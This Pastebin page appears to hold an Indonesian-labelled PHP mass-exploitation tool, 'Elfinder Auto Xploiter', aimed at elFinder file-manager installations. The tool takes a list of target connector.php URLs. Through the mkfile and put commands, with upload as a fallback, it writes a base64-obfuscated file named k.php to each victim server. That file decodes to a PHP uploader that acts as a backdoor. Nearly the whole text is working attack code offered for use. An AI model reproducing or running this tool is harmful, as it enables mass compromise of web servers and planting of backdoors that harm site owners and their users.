API tools faq
paste
ToKeiChun

Elfinder Auto Xploiter [ Mass Xploiter ]

ToKeiChun
Oct 8th, 2019
446
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.69 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <style type="text/css">
  3. html {
  4. text-align: center;
  5. }
  6. a {
  7. text-decoration: none;
  8. color: black;
  9. }
  10. </style>
  11. <form method="post">
  12. Target: <br>
  13. <textarea name="target" placeholder="http://www.target.com/elFinder/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize: none;"></textarea><br>
  14. <input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="hajar">
  15. </form>
  16. </html>
  17. <?php
  18. # IndoXploit
  19. function ngirim($url, $isi) {
  20. $ch = curl_init ("$url");
  21. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  22. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  23. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  24. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  25. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  26. curl_setopt ($ch, CURLOPT_POST, 1);
  27. curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
  28. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  29. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  30. $data3 = curl_exec ($ch);
  31. return $data3;
  32. }
  33. $target = explode("\r\n", $_POST['target']);
  34. if($_POST['x']) {
  35. foreach($target as $korban) {
  36. $nama_doang = "k.php";
  37. $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
  38. $decode_isi = base64_decode($isi_nama_doang);
  39. $encode = base64_encode($nama_doang);
  40. $fp = fopen($nama_doang,"w");
  41. fputs($fp, $decode_isi);
  42. echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
  43. echo "# Upload[1] ......<br>";
  44. $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
  45. $b = file_get_contents("$url_mkfile");
  46. $post1 = array(
  47. "cmd" => "put",
  48. "target" => "l1_$encode",
  49. "content" => "$decode_isi",
  50. );
  51. $post2 = array(
  52. "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
  53. "upload[]" => "@$nama_doang",);
  54. $output_mkfile = ngirim("$korban", $post1);
  55. if(preg_match("/$nama_doang/", $output_mkfile)) {
  56. echo "# Upload Success 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  57. } else {
  58. echo "# Upload Failed 1 <br># Uploading 2..<br>";
  59. $upload_ah = ngirim("$korban?cmd=upload", $post2);
  60. if(preg_match("/$nama_doang/", $upload_ah)) {
  61. echo "# Upload Success 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  62. } else {
  63. echo "# Upload Failed 2<br><br>";
  64. }
  65. }
  66. }
  67. }
  68. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!